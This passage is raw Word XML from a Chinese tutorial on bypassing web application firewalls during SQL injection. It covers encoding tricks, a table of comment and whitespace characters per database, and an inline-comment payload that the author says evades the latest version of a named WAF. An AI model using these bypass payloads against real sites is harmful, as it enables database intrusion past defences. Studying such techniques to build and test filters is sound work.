          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.2、使用编码</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:p w14:paraId="5B3A56D1">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="u54bd3399"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>如常见的使用HEX编码，或者使用ASCII编码再使用特定函数进行解码，也可以尝试Base64编码进行绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:p w14:paraId="4FB3C21E">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="u42138511"/>
      <w:bookmarkStart w:id="43" w:name="u312d921d"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="1904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333066" cy="2064558"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:p w14:paraId="1BF88232">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="jMABk"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.3、使用注释绕过</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:p w14:paraId="3239BED7">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="u0696f112"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在此之前，需要了解一下注释符以及其它空白符</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblInd w:w="115" w:type="dxa"/>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108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1191"/>
        <w:gridCol w:w="2818"/>
        <w:gridCol w:w="3258"/>
        <w:gridCol w:w="1715"/>
      </w:tblGrid>
      <w:tr w14:paraId="4C84A485">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108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2378"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65ABB011">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:bookmarkStart w:id="46" w:name="u41ccd631"/>
            <w:bookmarkStart w:id="47" w:name="wV59R"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 数据库</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="46"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3829"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4A123269">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="48" w:name="ueba2a65d"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="48"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4415"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6A8BF2BF">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="49" w:name="u2cd03db4"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="49"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3012"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562F4674">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="50" w:name="uc7da3191"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MSSQL</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="50"/>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4318B9FA">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108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2378"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1D952A03">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="51" w:name="ud3f233d4"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释符</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="51"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3829"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73C7BDB7">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="52" w:name="ude684f0c"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/、#、/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/、/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>!50000xx*/、--、-- - 、--+</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="52"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4415"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2E2F6A09">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="53" w:name="u4f4353a4"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>--、/**/ --%0a-</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="53"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3012" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:left w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:bottom w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:right w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="15" w:type="dxa"/>
              <w:left w:w="15" w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FEF6F88">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="54" w:name="u8f8aed35"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>--、/**/、--%0a-</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="54"/>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="014D4FB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108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="495" w:hRule="atLeast"/>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2378" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:left w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:bottom w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:right w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
            <w:tcMar>
              <w:top w:w="15" w:type="dxa"/>
              <w:left w:w="15" w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E76E25D">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="55" w:name="u114a276f"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>空白字符</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="55"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3829" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:left w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:bottom w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:right w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
            <w:tcMar>
              <w:top w:w="15" w:type="dxa"/>
              <w:left w:w="15" w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12B4623D">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="56" w:name="u2c4cf340"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>%09%0A%0B%0C%0D%20</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="56"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:left w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:bottom w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:right w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
            <w:tcMar>
              <w:top w:w="15" w:type="dxa"/>
              <w:left w:w="15" w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4730BA0B">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="57" w:name="ub41a32ee"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>%00%09%0A%0B%0C%0D%20</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="57"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3012" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:left w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:bottom w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
              <w:right w:val="single" w:color="EEEEEE" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
            <w:tcMar>
              <w:top w:w="15" w:type="dxa"/>
              <w:left w:w="15" w:type="dxa"/>
              <w:bottom w:w="15" w:type="dxa"/>
              <w:right w:w="15" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5116B5DA">
            <w:pPr>
              <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="58" w:name="u75cdaf9e"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>%00-%20</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="58"/>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="47"/>
    </w:tbl>
    <w:p w14:paraId="6492A5A9">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59" w:name="MuCC1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%0a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>属于换行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/**/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>属于注释，其中的语句不会执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/*!*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>属于内联注释，可以执行 /*!50001and1=1*/ 当Mysql版本大于5.00.01时即可执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>可使用语句绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/*!50001and-- qwe/*%0a1=1*/</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其中详解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-- qwe注释了/* 因为-- qwe是单行注释，因此当遇到%0a换行时就不会再接着注释了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>其中因为1=1写在/**/里面，WAF认为他是一个注释，所以不会管，但其实我们以及注释了这个/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">结尾的*/是闭合开始时的/*!   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:p w14:paraId="63C0FCFC">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="u1e470f0c"/>
      <w:bookmarkStart w:id="61" w:name="ufa2da676"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="3785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315200" cy="4740120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:bookmarkEnd w:id="61"/>
    <w:p w14:paraId="72C8CCE3">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="u0d2670cb"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>测试可绕最新版傻狗</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:p w14:paraId="7286DDBC">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="u469ef33d"/>
      <w:bookmarkStart w:id="64" w:name="u6122fe98"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="2978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265334" cy="3195150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:p w14:paraId="660CE830">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="ua7cc1c91"/>
      <w:bookmarkStart w:id="66" w:name="u4ef51856"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="1588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9618134" cy="2616096"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:p w14:paraId="7AD9D966">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="ude58c9be"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在此处无论写什么都可以绕过检测</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="67"/>
    <w:p w14:paraId="2E7583ED">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="PqXeI"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>2.4、绕过空格过滤</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:p w14:paraId="71CA0949">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
